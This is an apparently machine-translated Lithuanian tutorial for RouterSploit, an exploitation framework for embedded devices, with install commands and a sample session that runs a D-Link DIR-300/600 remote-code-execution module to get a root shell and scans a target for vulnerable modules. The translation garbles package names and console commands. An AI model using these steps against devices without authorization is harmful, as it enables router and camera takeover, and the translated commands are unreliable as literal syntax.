
RouterSploit yra nuostabi išnaudojimo sistema, sukurta specialiai įterptiesiems įrenginiams.
Šį įrankį pentester gali naudoti kamerų ir maršrutizatorių saugumui nuskaityti.
„RouterSploit“ akcentai:
- Užkoduota Python.
- Komandinės eilutės sąsaja.
- Docker palaikymas.
- Moduliniai įrankiai.
Palaikoma OS:
- MacOS.
- Linux.
- Android telefonas.
- Windows.
„RouterSploit“ diegimas:
Reikalavimai:
- ateities
- prašymus
- Paramic
- sustoti
- pycrypto
Neprivaloma:
- melsvas – Bluetooth mažai energijos
Diegimas Kali Linux:
Vykdykite toliau pateiktas komandas:
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
Bluetooth Low Energy palaikymas:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
Diegimas Ubuntu:
Vykdykite toliau pateiktas komandas:
sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py
Bluetooth Low Energy palaikymas:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
Diegimas MacOS:
Vykdykite toliau pateiktas komandas:
git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py
Diegimas „Docker“.:
Vykdykite toliau pateiktas komandas:
git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit
Kaip atnaujinti RouterSploit?
Turite dažnai atnaujinti RouterSploit, kad išvengtumėte nepatogumų.
Nauji moduliai pristatomi beveik kiekvieną dieną.
cd routersploit
git pull
Kaip naudoti RouterSploit?
Naudojimas
root@kalidev:~/git/routersploit# ./rsf.py ______ _ _ _ _ _ | ___ \ | | / ___| | | (_) | | |_/ /___ _ _| |_ ___ _ __ `--. _ __ | | ___ _| |_ | // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __| | |\ \ (_) | |_| | || __/ | /\__/ / |_) | | (_) | | |_ _| \____/ __,_|\_____|_| \____/| .__/|_|\___/|_|\__| | | Eksploatavimo sistema, skirta |_| pagal Threat9 Įterptieji įrenginiai Kodinis pavadinimas : Aš žinojau, kad tau sunku Versija : 3.3.0 Pagrindinis puslapis : https://www.threat9.com/ - @threatnine Prisijunkite prie Slack : routersploit.slack.com Prisijunkite prie Threat9 beta programos - https://www.threat9.com/ Išnaudojimai: 128 Skaitytuvai: 4 Kreditai: 165 Bendras: 4 Naudingi kroviniai: 32 Kodavimo įrenginiai: 6 rsf >
Išnaudojimai:
Parengti išnaudojimą, tiesiog pasirinkite modulį ir nustatykite tikslą:
rsf > naudoti išnaudojimus/ exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/ rsf > naudokite exploits/dlink/dir_300_600_rce rsf (D-LINK DIR-300 & DIR-600 RCE) >
Norėdami užbaigti, naudokite tabuliavimo klavišą.
Norėdami parodyti parinktis, tiposhow:
rsf (D-LINK DIR-300 & DIR-600 RCE) > rodyti parinktis Tikslinės parinktys: Pavadinimas Dabartiniai nustatymai Aprašymas ---- ---------------- ----------- tikslinis Tikslinis adresas pvz. http://192.168.1.1 uostas 80 Tikslinis uostas
Naudokiterun arbaexploit komanda išnaudoti taikinį:
rsf (D-LINK DIR-300 & DIR-600 RCE) > paleisti [+] Tikslas yra pažeidžiamas [*] Iškviečiamas komandų ciklas... cmd > whoami šaknis
Norėdami nustatyti parinktis:
rsf (D-LINK DIR-300 & DIR-600 RCE) > nustatyti tikslą http://192.168.1.1 [+] {'target': 'http://192.168.1.1'}
Galima patikrinti, ar taikinys yra pažeidžiamas konkretaus išnaudojimo:
rsf (D-LINK DIR-300 & DIR-600 RCE) > patikrinti [+] Tikslas yra pažeidžiamas
Bėkshow info kad būtų rodoma informacija apie išnaudojimą.
Pažeidžiamų taikinių nuskaitymas:
Skaitytuvai leidžia greitai patikrinti, ar taikinys yra pažeidžiamas dėl kokių nors išnaudojimų.
Naudokite tas pačias komandas, kad parodytumėte / nustatytumėte parinktis, ir taip pat bėgti.
rsf (D-Link skaitytuvas) > paleisti [+] exploits/dlink/dwr_932_info_disclosure yra pažeidžiamas [-] exploits/dlink/dir_300_320_615_auth_bypass nėra pažeidžiamas [-] exploits/dlink/dsl_2750b_info_disclosure nėra pažeidžiamas [-] exploits/dlink/dns_320l_327l_rce nėra pažeidžiamas [-] exploits/dlink/dir_645_password_disclosure nėra pažeidžiamas [-] exploits/dlink/dir_300_600_615_info_disclosure nėra pažeidžiamas [-] exploits/dlink/dir_300_600_rce nėra pažeidžiamas [+] Įrenginys yra pažeidžiamas! - exploits/dlink/dwr_932_info_disclosure
Taip pat skaitykite: 1337x proxy
Baigiamieji žodžiai:
RouterSploit yra nuostabi priemonė naudoti.
Jei susiduriate su problemomis, susijusiomis su RouterSploit. Būtinai pakomentuokite žemiau. Mūsų komanda CSHAWK kuo greičiau su jumis susisieks.